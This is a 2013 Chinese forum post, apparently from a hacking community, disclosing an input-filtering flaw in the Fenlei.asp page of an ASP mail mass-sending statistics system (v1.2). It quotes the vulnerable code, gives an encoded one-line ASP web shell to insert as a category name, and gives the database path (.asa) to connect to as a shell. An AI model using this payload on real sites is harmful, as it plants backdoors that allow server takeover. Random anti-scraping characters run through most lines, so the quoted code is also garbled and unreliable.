找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1997|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 6 M' d2 D8 R7 J  B. ?
4 F* n7 X$ t3 Q4 j
IF Request.QueryString("Action")="del" Then 7 @% y1 @, ^/ N9 d% C: y7 g0 E9 v* l
ID=Request.QueryString("ID") ' v* }1 \" i- i
IF Countss ("tui","Fenlei",ID )<>0 then . C, O% w! W/ M  d/ v* O+ v' \1 J
'略
) J2 l* V' I) [! p# iIF Request.QueryString("Action")="Add" Then
9 I5 b7 s1 I1 Y7 c3 n  f! S" s  `Tname=Request.Form("Typename") & v6 m) k/ B  \
Set Rs=Server.CreateObject("adodb.Recordset")   f2 a- M+ M8 S( K$ @$ S8 d
Sql="Select * From Fenlei Order by id Desc "   p7 S( c# l* ~) \. T5 l6 X
Rs.Open Sql,Conn,1,3 # c, @/ l+ {9 W0 ~6 u2 K: I/ K
Rs.Addnew
  {# H8 R! c& J! KRs("Typename")=Tname 5 q6 w( c7 X3 I/ x
'略 / j" c& ]& t" t' M
Set Rs=Server.CreateObject("adodb.Recordset") & x; q* Q, k& L
Sql="Select * From Fenlei Order by id Desc " / I% y/ e2 [! s. V4 Q
Rs.Open Sql,Conn,1,1 * L( W. @- ?0 o- R8 O( A) z
'略 / K' i+ H% g) s( u% e  e1 C
%>
; f6 U- p% J4 s+ x; C $ B% _: v" X" {
5 R0 Y/ G0 `2 L/ ]

8 a. K: P0 z% r4 ^9 m没有过滤,直接写入数据库。, Q, x- W9 V" b" ?3 {4 e

& }/ a6 z3 Z1 a5 U) O& j利用方法:
* P2 |4 j$ g& Z, E
( o" l, k( O  Z4 V1 V插入:┼攠數畣整爠煥敵瑳∨≡┩>0 {6 T" r0 e6 e3 _

- t. d1 L6 `6 r* B % V( n5 s1 G  ?
连接: http://www.xxx.com/###tongbaner.asa
0 ]% ?* G, C2 m'默认安装文件: ; f! p6 @# ~( |
'install.asp
; F. g3 F3 S/ i$ W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表